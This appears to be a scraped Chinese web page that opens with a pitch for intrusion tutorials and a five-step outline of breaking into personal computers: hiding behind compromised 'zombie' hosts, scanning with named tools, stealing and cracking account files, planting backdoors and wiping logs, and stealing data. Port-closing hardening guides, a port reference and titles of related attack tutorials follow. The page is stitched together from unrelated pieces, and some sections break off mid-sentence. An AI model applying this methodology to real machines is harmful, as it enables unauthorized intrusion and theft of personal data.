个人主机入侵网络攻击知道对方IP该怎么入侵最新教学，有人问技术有展示吗？我怎么知道你是不是骗我的呢？既然知道我是骗你的，为什么还要学习呢？为什么非要我说一句：是真的，不骗你。你们才肯相信呢？不相信可以不和我联系，或者直接拉黑我，不要和我废话，多说也无益，为什么还要和我说呢？教学可以公开一些，无所谓，最重要是你们真学，想学，肯学，那才重要！不付出那怎么有回报呢，难道天下的饭店我们都可以随便吃喝吗？个人主机入侵网络攻击的步骤第一步：隐藏自已的位置为了不在目的主机上留下自己的IP地址，防止被目的主机发现，老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。所谓“肉鸡”通常是指，HACK实现通过后门程序控制的傀儡主机，通过“肉鸡”开展的扫描及攻击，即便被发现也由于现场遗留环境的IP地址是“肉鸡”的地址而很难追查。第二步：寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地址，域名是为了便于记忆主机的IP 地址而另起的名字，只要利用域名和IP地址就可以顺利地找到目标主机。当然，知道了要攻击目标的位置还是远远不够的，还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。此时，攻击者们会使用一些扫描器工具，以试图获取目标主机运行的是哪种操作系统的哪个版本，系统有哪些帐户，开启了哪些服务，以及服务程序的版本等资料，为入侵作好充分的准备。第三步：获取帐号和密码，登录主机攻击者要想入侵一台主机，首先要有该主机的一个帐号和密码，否则连登录都无法进行。这样常迫使他们先设法盗窃帐户文件，进行破解，从中获取某用户的帐户和口令，再寻觅合适时机以此身份进入主机。当然，利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。第四步：获得控制权攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后，就会做两件事：清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序，以便日后可以不被觉察地再次进入系统。此外，为了避免目标主机发现，清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后，攻击者就开始下一步的行动。第五步：窃取网络资源和特权攻击者找到攻击目标后，会继续下一步的攻击。如：下载敏感信息；窃取帐号密码、个人资料等。三、网络攻击的原理和手法 1、从扫描开始扫描往往是攻击的前奏，通过扫描，搜集目标主机的相关信息，以期寻找目标主机的漏洞。常见的扫描工具有X-scan、superscan、流光、X-port等。在这些工具中，国产的X-scan与流光可算的上是两个“利器”，这两个工具不但具有相当快的扫描速度和精确度（个人感觉X-scan在扫描速度上可能更快一点），同时还是发起攻击的第一手选择，当然在攻击方面，流光更为强悍些。除了常见个WWW（80）、FTP（21）、TELNET（23）等，查查十大高风险事件，我们就知道，攻击者通常还对下列端口很感兴趣： 135：MS RPC，可以产生针对Windows 2000/XP RPC服务远程拒绝服务攻击，以及RPC溢出漏洞，著名的“冲击波”“震荡波”就是利用DCOM RPC感染设备； 137~139：NetBIOS，WINDOWS系统通过这个端口提供文件和打印共享； 445：Microsoft-ds，非常重要的端口，LSASS漏洞、RPC定位漏洞都在这里出现； 1433：Microsoft SQL，后面会提到，SQL SERVER默认安装时留下的空口令SA用户可以让攻击者为所欲为； 5632：PCANYWERE，一种远程终端控制软件； 3389：WINDOWS远程终端服务 4899：RADMIN，一种远程终端控制软件由此可见，没有扫描，自然也就没有攻击，从安全的角度的来说，个人主机最安全的系统应该算是WINDOWS98，由于

关闭135、137、139、445、3389端口的方法

关闭135、137、139、445、3389端口的方法操作前请您根据对业务的影响情况进行评估关闭135端口方法：操作建议：为了避免“冲击波”病毒的攻击，建议关闭135端口。一、单击“开始”——“运行”，输入“dcomcnfg”，单击“确定”，打开组件服务。二、在弹出的“组件服务”对话框中，选择“计算机”选项。三、在“计算机”选项右边，右键单击“我的电脑”，选择“属性”。

四、在出现的“我的电脑属性”对话框“默认属性”选项卡中，去掉“在此计算机上启用分布式COM”前的勾。五、选择“默认协议”选项卡，选中“面向连接的TCP/IP”，单击“删除”按钮。

六、单击“确定”按钮，设置完成，重新启动后即可关闭135端口。关闭137、139端口方法：操作建议：如果不需要提供文件和打印机共享，建议关闭137、139端口。一、右键单击桌面右下角“本地连接”图标，选择“状态”。在弹出的“本地连接状态”对话框中，单击“属性”按钮。

二、在出现的“本地连接属性”对话框中，选择“Internet协议（TCP/IP）”，双击打开。三、在出现的“Internet协议（TCP/IP）属性”对话框中，单击“高级”按钮。

四、在出现的“高级TCP/IP设置”对话框中，选择“WINS”选项卡，在“WINS”选项卡，“NetBIOS设置”下，选择“禁用TCP/IP上的”NetBIOS。

五、单击“确定”，重新启动后即可关闭137、139端口。关闭445端口的方法：一、单击“开始”——“运行”，输入“regedit”，单击“确定”按钮，打开注册表。二、找到注册表项 “HKEY_LOCAL_MACHINE\System\currentControlset\Services\NetBT\Parame ters”。三、选择“Parameters”项，右键单击，选择“新建”——“DWORD值”。

常用端口号大全

常用端口号大全 20和21，究竟哪个是传控制的，哪个是传数据的？ ftp-data 20/tcp File Transfer [Default Data] ftp-data 20/udp File Transfer [Default Data] ftp 21/tcp File Transfer [Control] ftp 21/udp File Transfer [Control] FTP就是文件传输协议File Transfer Protocol 的缩写. FTP端口号是21 FTP的端口号能改 ftp的端口号20、21的区别一个是数据端口，一个是控制端口，控制端口一般为21，而数据端口不一定是20，这和FTP的应用模式有关，如果是主动模式，应该为20，如果为被动模式，由服务器端和客户端协商而定电脑上有多少个端口？我怎么样才能知道自己的电脑哪些端口是开的？那些是关的？哪些是可用的？怎么样才能把打开着的关了，把关着的打开，电脑上有多少个端口。计算机“端口”是英文port的义译，可以认为是计算机与外界通讯交流的出口。其中硬件领域的端口又称接口，如：USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口，是一种抽象的软件结构，包括一些数据结构和I/O（基本输入输出）缓冲区。按端口号可分为3大类：（1）公认端口（Well Known Ports）：从0到1023，它们紧密绑定（binding）于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如：80端口实际上总是HTTP通讯。（2）注册端口（Registered Ports）：从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口，这些端口同样用于许多其它目的。例如：许多系统处理动态端口从1024左右开始。（3）动态和/或私有端口（Dynamic and/or Private Ports）：从49152到65535。理论上，不应为服务分配这些端口。实际上，机器通常从1024起分配动态端口。但也有例外：SUN的RPC端口从32768开始。一些端口常常会被黑客利用，还会被一些木马病毒利用，对计算机系统进行攻击，以下是计算机端口的介绍以及防止被黑客攻击的简要办法。 8080端口端口说明：8080端口同80端口，是被用于WWW代理服务的，可以实现网页浏览，经常在访问某

Win7如何简单的关闭445端口及445端口入侵详解

常用端口号大全

最新整理win10关闭445端口详细教程步骤

各个端口的入侵方法(入侵菜鸟必看)

计算机端口详解与常见端口入侵方法

手动封闭137、138、139、445端口

常用入侵端口

常用的端口入侵

135端口入侵的方法(简单)

常见端口对照表

黑客常用的几种入侵端口的方法

服务器135137138139445等端口解释和关闭方法

电脑常用端口端口大全

黑客MS08-067漏洞攻击全程演示(图解)

139端口入侵简易教程

xp如何关闭445端口方法

个人主机入侵网络攻击 知道对方IP该怎么入侵

关闭135、137、139、445、3389端口的方法

常用端口号大全

个人主机入侵网络攻击知道对方IP该怎么入侵